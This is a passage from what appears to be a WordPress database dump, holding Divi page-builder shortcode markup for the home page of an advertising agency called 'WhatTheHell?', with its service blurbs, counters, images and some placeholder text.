20:18:10','',564,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/564-revision-v1/',0,'revision','',0),(606,1,'2020-08-07 20:18:38','2020-08-07 20:18:38','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\" hover_enabled=\"0\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/banner.jpg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px|\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" hover_enabled=\"0\" make_fullwidth=\"on\" alt=\"Main Banner WhatTheHell?\" title_text=\"main banner \"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" global_module=\"569\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>\n[/et_pb_text][et_pb_button button_text=\"Learn More\" _builder_version=\"4.5.2\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"fade\" hover_enabled=\"0\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" button_alignment=\"center\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.5.2\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\" hover_enabled=\"0\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" hover_enabled=\"0\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||110px|\" hover_enabled=\"0\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>\n[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||5px|||\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||40px|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" alt=\"Why We\" title_text=\"Why-we\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" hover_enabled=\"0\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\" custom_margin=\"-86px|||||\"]<h2><span>Why choose us?</span></h2>\n[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"||31px|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p><span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>\n[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-04-1.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" 